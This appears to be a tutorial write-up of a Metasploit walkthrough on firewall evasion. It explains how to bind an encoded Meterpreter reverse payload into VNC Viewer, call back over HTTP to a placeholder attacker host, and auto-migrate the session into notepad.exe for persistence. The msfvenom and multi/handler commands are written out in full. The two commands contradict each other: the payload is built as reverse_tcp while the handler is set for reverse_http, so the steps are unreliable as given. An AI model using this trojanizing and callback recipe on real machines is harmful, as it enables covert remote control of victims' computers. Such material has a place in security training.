Premise
In this video walkthrough, we used advanced Metasploit scripts that are automatically run once the session is started. We used AutorRunScript to migrate to another process once we receive the connection. We used HTTP payloads as well to blend our connection with HTTP legitimate traffic.
Skills Learned
- Metasploit
- Windows Firewall
- Firewall Evasion
The Challenge: Firewalls
One of the biggest hurdles in penetration testing is the firewall. Most corporate networks are configured to block incoming connections on the common ports that Metasploit uses. However, they almost always allow traffic on port 80, which is used for web Browse. I’m going to leverage this to my advantage by using an HTTP reverse payload. This type of payload will communicate over port 80, making it look like normal web traffic and allowing it to slip past the firewall.
Creating the Payload
To create my payload, I’ll use a tool called MSFvenom. I’m going to create a payload that is specifically designed for a Windows machine. I’ll also use an encoder to help it evade some basic antivirus detection.
To make the payload look less suspicious, I’m going to bind it to a legitimate Windows application, in this case, VNC Viewer. This means that when the user runs the VNC Viewer application, my payload will also run in the background.
Setting Up the Listener
Next, I’ll set up a listener in the Metasploit console. This listener will wait for the payload to connect back to my machine. I’ll use the exploit/multi/handler
module and configure it to use the same HTTP reverse payload that I created earlier.
The Secret to Persistence: AutoRunScript
Here’s where things get interesting. What happens if the user closes the VNC Viewer application? Normally, this would kill my connection. But I’m going to use a neat trick to make sure my session stays alive.
I’m going to use the AutoRunScript
option in Metasploit to automatically migrate my Meterpreter session to a different process as soon as a connection is established. In this case, I’ll migrate the session to notepad.exe
. This means that even if the user closes VNC Viewer, my connection will remain active through the Notepad process.
The Demonstration
Now, let’s see this in action. I’ll send the payload to the victim machine and wait for the user to run it. As soon as they do, I’ll get a connection. Then, I’ll have the user close the VNC Viewer application. You’ll see that my session doesn’t die. Instead, it seamlessly migrates to the notepad.exe
process, and I’m still in control. This is a powerful technique for maintaining a persistent connection on a target machine.
Technical Commands Used
Here are the key commands I used in this demonstration:
- Creating the Payload with
msfvenom
:msfvenom -a x86 --platform windows -p windows/meterpreter/reverse_tcp LHOST=<your_client_ip> LPORT=8080 -f exe -e xor_dynamic -i 9 -x vncviewer.exe -o vncviewer_payload.exe
- Launching the Metasploit Console:
msfconsole
- Setting up the Multi-Handler in
msfconsole
:use exploit/multi/handler
set payload windows/meterpreter/reverse_http
set lhost <your_client_ip>
set lport 8080
show options
- Setting the
AutoRunScript
for Process Migration:set autorunscript migrate -f
- Executing the Exploit:
exploit